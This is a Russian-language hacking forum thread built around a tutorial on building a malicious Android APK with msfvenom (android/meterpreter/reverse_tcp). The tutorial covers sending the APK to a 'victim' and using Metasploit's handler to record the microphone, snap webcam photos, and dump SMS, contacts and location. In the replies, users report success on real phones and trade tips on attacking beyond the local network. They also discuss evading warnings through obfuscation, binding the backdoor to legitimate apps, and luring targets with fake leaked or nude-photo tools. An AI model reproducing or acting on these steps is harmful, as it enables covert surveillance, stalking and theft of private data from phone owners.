Soft Metasploit для будущих хакеров (msfvenom payload): Взломайте любой телефон на Android

Утилита Msfvenom в дистрибутиве kali linux используется для взлома android. Является комбинацией утилит Msfpayload и Msfencode, объединившей в себе оба инструмента в одну платформу Framework instance под названием msfvenom payload.

Установка и использование msfvenom payload:

1. Запустите kali и откройте панель управления.
2. Установите payload и создайте всплывающее окно пользователя вот этой командой:
Код: 
root@kali:-# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.110 LPORT=4444 R > andro.apk
(Для того чтобы узнать свой LHOST, откройте новый терминал и введите ifconfig)

Файл apk сохранен в базовую папку.
Примечание: Нигде не добавляйте лишних символов и пробелов. Используйте команду в формате «как есть»( после изменения LHOST и LPORT как необходимо).
Нажмите, чтобы раскрыть...
3. Передайте/ отправьте по e-mail этот файл (andro.apk) на телефон жертвы и запустите установку.
4. Запустите metasploit framework следующей командой
Код: 
root@kali:-# msfconsole
5. Теперь пора открыть и установить мульти-драйвер. Выполните следующие операции:
Код: 
msf > use multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.110
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit
Запускается драйвер Payload……..
6. Когда жертва кликает на приложение ( установленное в меню телефона как основное действие ) запускается система удаленного управления.
7. Воспользуйтесь следующими командами просмотра:
  • record_mic
  • webcam_snap
  • webcam_stream
  • dump_contacts
  • dump_sms
  • geolocate
Что делать, если вылетает ошибка парсинга:
Код: 
Error fixing(incase you get PARSE ERROR)
Для исправления этой ошибки
Ссылка скрыта от гостей
signapk

После чего выполните следующие операции:
  1. Откройте папку «Signapk» и запустите расширение «cmd».
  2. Скопируйте «andro.apk» (созданное вами приложение) в папку Signapk.
  3. Введите следующую команду java -” jar signapk.jar certificate.pem key.pk8 andro.apk andro-signed.apk “в cmd (без двойных кавычек)
  4. Скопируйте на телефон и установите.
  5. Молимся чтобы сработало…
Перевод: Maryana Nazarenko
Источник:
Ссылка скрыта от гостей
 
  • Нравится
Реакции: removed, RealNapst3r, Demi и ещё 3
Нажмите, чтобы раскрыть...
Д

Даниил Чистяков

Простите, но я делаю все согласно инструкции, но meterpeter не обращает внимания на мой смартфон, я запускаю программу и код, но ничего не происходит
 
  • Нравится
Реакции: WoOnder и m4dmeds
Н

Неизвестный

а где папка где лежит сделанный апк
 
P

PoLMoRFi

Member
31.05.2019
9
0
BIT
5
Все гуд. Работает) Вот интересно. А реально такое реализовать, не в "локалке", и что бы без предупреждений - что это вирус? Хотя-бы намекните)))
 
Sgtron Versio

Sgtron Versio

Green Team
13.03.2019
28
2
BIT
0
Во первых IP 168.192.ХХ.ХХ должны быть в одной подсети. (инач несработает)
На ведройде должна стоять галочка установка приложений из неизвестных источников.
При передачи по емайлу скорее всего поругается сервис (гугл и майл) посчитает что хотите отправить вирус ))
....
приложение apk может рухнуть и сессия тю-тю. (нужно проверить не всегда срабатывает)
 
  • Нравится
Реакции: PoLMoRFi
Sgtron Versio

Sgtron Versio

Green Team
13.03.2019
28
2
BIT
0
Не во всех дистрибутивах будут права на запись в эту директорию=папку (если конечно глупо от root работать)
мне нужно явно указывать куда сохранять (где есть права на запись)
root@kali:-# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.110 LPORT=4444 R > andro.apk
 
centr

centr

Green Team
31.01.2017
408
477
BIT
0
PoLMoRFi сказал(а):
Все гуд. Работает) Вот интересно. А реально такое реализовать, не в "локалке", и что бы без предупреждений - что это вирус? Хотя-бы намекните)))
Нажмите, чтобы раскрыть...

Работая с VPS коннект в не локальной сети разумеется реален( так же возможно указать свой внешний ip и тоже будет работать, если не сработает значить проброс порта.), с предупреждениями не много сложней.
 
  • Нравится
Реакции: PoLMoRFi
ghostphisher

ghostphisher

местный
07.12.2016
2 602
3 413
BIT
0
PoLMoRFi сказал(а):
Все гуд. Работает) Вот интересно. А реально такое реализовать, не в "локалке", и что бы без предупреждений - что это вирус? Хотя-бы намекните)))
Нажмите, чтобы раскрыть...

Да назовите Deeppink - утилита по автораздеванию фото, там за секнуду поставят ;) не обращая внимания на предупреждения ;) Самое главное, когда нет возможности создать красивый apk нужно применять таргетированое СИ - смотреть на тренды в It, в потребности человека и предлогать ему подобное. СЛИВ АНБ, УТИЛИТА ДЛЯ СЛЕЖКИ, ОТ НАС ЭТО СКРЫВАЛИ! ФАЙЛ БУДЕТ ДОСТУПЕН 12 ЧАСОВ ПОТОМ УДАЛЮ ИНАЧЕ МЕНЯ ПОЙМАЮТ! и в том же духе, так и разводят во многих каналах ТГ где общаеют СЛИВЫ, ЧЕРНЫЙ ХАК, ДАРК ХАЙД, АНОНИМНЫЙ КАНАЛ - в 99% это тупо скрытая реклама своих курсов и впаривание файлов с полезной нагрузкой ( 80% скачивают "ПРИВАТНЫЙ" софт под linux - думаю что linux это так безопасно ), а так вместе с красивой программой подгружается в систему модуль , через который может быть как простейший майнинг так и ботнет.
 
  • Нравится
Реакции: Nick Jonas, Get waste, PoLMoRFi и ещё 3
PresetX

PresetX

Green Team
18.01.2018
26
5
BIT
2
PoLMoRFi сказал(а):
Все гуд. Работает) Вот интересно. А реально такое реализовать, не в "локалке", и что бы без предупреждений - что это вирус? Хотя-бы намекните)))
Нажмите, чтобы раскрыть...
Не в локалке - нужен открытый порт на атакуемом/атакующем устройстве (tcp/reverse_tcp) или сервер, принимающий запросы.
Без предупреждений при установке - убрать некоторые permission, обфусцировать наверное (популярный софт же), или написать программу, получающую доступ к root, и через нее грузить приложение)
 
  • Нравится
Реакции: Уграк Роман и PoLMoRFi
Krypton 8ch5

Krypton 8ch5

One Level
08.10.2019
1
1
BIT
0
PoLMoRFi сказал(а):
Все гуд. Работает) Вот интересно. А реально такое реализовать, не в "локалке", и что бы без предупреждений - что это вирус? Хотя-бы намекните)))
Нажмите, чтобы раскрыть...
Не в локалке можно изменить значение lhost на твой глобальный ip в msfvenom а в настройке в metasploit указать локалку.
 
  • Нравится
Реакции: PoLMoRFi
Данил Нткудин

Данил Нткудин

New member
19.10.2019
3
0
BIT
0
что делать если сто лет запускается?
 

Вложения

  • Снимок экрана от 2019-10-19 22-45-07.png
    Снимок экрана от 2019-10-19 22-45-07.png
    70,7 КБ · Просмотры: 1 608
EnTerFoll

EnTerFoll

New member
14.06.2019
1
0
BIT
0
PoLMoRFi сказал(а):
Все гуд. Работает) Вот интересно. А реально такое реализовать, не в "локалке", и что бы без предупреждений - что это вирус? Хотя-бы намекните)))
Нажмите, чтобы раскрыть...
Krypton 8ch5 сказал(а):
Не в локалке можно изменить значение lhost на твой глобальный ip в msfvenom а в настройке в metasploit указать локалку.
Нажмите, чтобы раскрыть...
Но при этом не стоит забывать про открытый порт, который нужно пробросить

У меня есть несколько вопросов. Первый - как сделать так, чтобы сессия не умирала(как я понимаю, mainactivity быстро очищается из оперативки) Второй: Я с помощью кода на питоне слил апк бэкдор с апк термукса(просто для примера), но при запуске приложения сессия не открывается. Я конечно не ручаюсь за правильность кода, но вроде он выводит третий апк, когда после декомпиляции сливает манифесты и остальные нужные файлы в один. В итоге получаем, что просто мейн активити палится и сессия подыхает за пару секунд(хотя на моём старом устройстве зачастую держалось до 10-ти минут), а при сливании с другим апк бэкдор даже не работает, устанавливая чистое приложение. Вот это и странно, по идее в манифесте бэкдора прописаны все разрешения, которые запрашиваются при установке, но при установке слитного апк они не выводятся, приложение остаётся чистым. Я ещё не супер знаток питона, мне пришлось этот код десять тысяч раз исправлять, когда я его нашёл в инете, и не факт, что я всё исправил

Данил Нткудин сказал(а):
что делать если сто лет запускается?
Нажмите, чтобы раскрыть...
У тебя не открывается сессия на твоём IP, мб ты что-то не так ввёл, иши ошибку
 
D

Demi

Mod. Ethical Hacking
16.02.2017
124
131
BIT
0
Sgtron Versio сказал(а):
Не во всех дистрибутивах будут права на запись в эту директорию=папку (если конечно глупо от root работать)
мне нужно явно указывать куда сохранять (где есть права на запись)
root@kali:-# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.110 LPORT=4444 R > andro.apk
Нажмите, чтобы раскрыть...

При выполнении команды, ты по умолчанию находишься в домашнем каталоге, соответственно права на запись у тебя есть, если ты конечно перед этим не переходил куда либо, но это уже как бы работа с системой, надеюсь мангалом не будут пользоваться по типу копи / паст
 
C

ck.

К удалению 21.01.2019
One Level
05.10.2017
1
1
BIT
0
СПАСИБИЩЕ! Все по инструкции сработало быстро на старый самсунг ж2. забросил, установил, сессию увидел и по списку все команды пробовать ............ все четко кроме.......... не пойму как в режиме реального времени микро прослушать либо на запись поставить ... а то аудио 0:00 сек несколько раз .. Как бы самая важная функция. Камеру Стримлю в каком то супер зуме тоже ... нихрена не вижу... мож сама труба и камера говно , завтра на другом попробую , но микро одинаковый у всех .. помогите кто знает ?
 
  • Нравится
Реакции: PoLMoRFi
Кирилл Чертков

Кирилл Чертков

Member
23.02.2020
15
0
BIT
0
Хелп у меня проблема на термукс я закидываю бэкдор на телефон пишу экспорт всё норм, но когда я ввожу команды к примеру record_mic webcsm_snap у меня вырубается сессия
Screenshot_2020-03-10-18-08-16-953_com.termux.png
 
Для ответа нужно войти/зарегистрироваться
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!

Верх Низ